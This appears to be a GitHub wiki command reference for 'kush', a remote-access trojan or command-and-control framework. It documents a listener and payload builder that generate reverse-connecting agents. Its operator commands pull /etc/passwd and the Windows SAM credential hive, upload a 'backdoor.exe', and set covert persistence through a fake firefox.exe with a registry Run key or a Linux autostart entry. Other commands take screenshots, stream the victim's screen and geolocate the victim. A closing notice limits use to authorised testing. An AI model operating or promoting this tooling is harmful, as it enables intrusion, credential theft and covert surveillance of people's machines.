Skip to content

command reference

Jump to bottom
SAM X86 edited this page Sep 27, 2025 · 1 revision

Command Reference

Core Commands

help

Displays all available commands with descriptions.

Usage:

kush> help

exit

Closes the current connection and exits the listener.

Usage

kush> exit

File Operations

download

Download a file from the target machine.

Usage

download <remote_path>

Example

kush> download /etc/passwd
kush> download C:\\Windows\\system32\\config\\SAM

upload

Upload a file to the target machine.

Usage

upload <local_path> <remote_path>

Examples:

kush> upload backdoor.exe C:\\Users\\Public\\backdoor.exe
kush> upload script.sh /tmp/script.sh

cd

Change directory on the target machine.

Usage

cd <path>

Examples:

kush> cd /tmp
kush> cd C:\\Windows\\Temp

System Commands

Any system command can be executed directly:

Windows Examples:

kush> whoami
kush> systeminfo
kush> net user
kush> dir C:\\
kush> type C:\\Windows\\system.ini

Linux Examples:

kush> whoami
kush> uname -a
kush> cat /etc/passwd
kush> ls -la /home/
kush> ps aux

Persistence Commands

windows_persistence

Establishes persistence on Windows systems by:

  • Copying the agent to %APPDATA%\firefox.exe

  • Adding a registry Run key for startup execution

Usage

kush> windows_persistence

linux_persistence

Establishes persistence on Linux systems by:

  • Copying the agent to XDG runtime directory

  • Creating a .desktop file in autostart directory

Usage

kush> linux_persistence

Surveillance Commands

screenshot

Takes a screenshot of the target's desktop and saves it locally.

Usage

kush> screenshot

Output: Saves as screenshot_[timestamp].jpg

start_stream

Starts real-time screen streaming.

Usage

start_stream [interval]

Parameters:

interval: Refresh interval in seconds (default: 1.0)

Examples:

kush> start_stream        # 1 second interval

or

kush> start_stream 0.5    # 0.5 second interval

stop_stream

Stops the screen streaming session.

Usage

kush> stop_stream

get_gps

Gets approximate geographical location based on IP address.

Usage

kush> get_gps

Sample Output:

[GPS Location]
  ip: 192.168.1.100
  city: New York
  region: New York
  country: US
  loc: 40.7128,-74.0060
  org: ASXXXX Example ISP

Builder Commands

Generating Payloads

Windows

python3 builder.py -t windows -i 192.168.1.100 -p 4444

Linux:

python3 builder.py -t linux -i 192.168.1.100 -p 4444

Listener Options

Basic usage:

python3 listener.py -i 0.0.0.0 -p 4444

Specific interface:

python3 listener.py -i 192.168.1.100 -p 4444

Command Tips

  • Tab completion: Works for file paths in upload/download commands

  • Command history: Use arrow keys to navigate previous commands

  • Typo correction: Automatically suggests similar valid commands

  • Multi-word paths: Use quotes for paths with spaces: download "C:\Program Files\file.txt"

Quick Reference Card

Basic:        help, exit, cd <path>
File Ops:     download <remote>, upload <local> <remote>
Persistence:  windows_persistence, linux_persistence
Surveillance: screenshot, start_stream, stop_stream, get_gps
System:       Any shell command (whoami, ls, ipconfig, etc.)

⚠️ Legal & Ethical Notice: This framework is strictly for authorized penetration testing, red-team exercises, and personal lab research. Running this tool on systems you don't own or without explicit permission is illegal.

Clone this wiki locally